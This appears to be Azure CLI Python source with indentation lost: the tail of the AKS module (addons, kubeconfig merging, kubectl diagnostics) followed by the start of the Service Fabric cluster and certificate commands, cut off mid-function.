_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=appgw_id_dict["subscription"], resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: {appgw_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
if CONST_INGRESS_APPGW_SUBNET_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: {subnet_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=False,
appgw_watch_namespace=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
elif addon.lower() == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.cli.core.profiles import ResourceType, get_sdk, get_api_version
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
from azure.cli.command_modules.servicefabric._arm_deployment_utils import validate_and_deploy_arm_template
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from knack.log import get_logger
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter',
'WindowsServer1709': "Datacenter-Core-1709-smalldisk",
'WindowsServer1709withContainers': "Datacenter-Core-1709-with-Containers-smalldisk",
'WindowsServer1803withContainers': "Datacenter-Core-1803-with-Containers-smalldisk",
'WindowsServer1809withContainers': "Datacenter-Core-1809-with-Containers-smalldisk",
'WindowsServer2019Datacenter': "2019-Datacenter",
'WindowsServer2019DatacenterwithContainers': "2019-Datacenter-Core-with-Containers"}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return cluster_list
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
if certificate_output_folder or certificate_file or certificate_output_folder or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\' , \'--certificate-file\', \'certificate_output_folder\', \'vault_resource_group_name\', \'certificate_password\' can not be specified, ' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
validate_and_deploy_arm_template(cmd, resource_group_name, template, parameters)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, None, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.add(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.certificate_issuer_thumbprint
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [n for n in cluster.node_types if n.is_primary is True][0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, primary_node_type.name)
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
# add cert to sf extension
import json
seconday_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext.settings["certificateSecondary"] = seconday_setting
# add cert and star vmss update
_add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster.cluster_id, vault_id, secret_url)
# cluser update
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
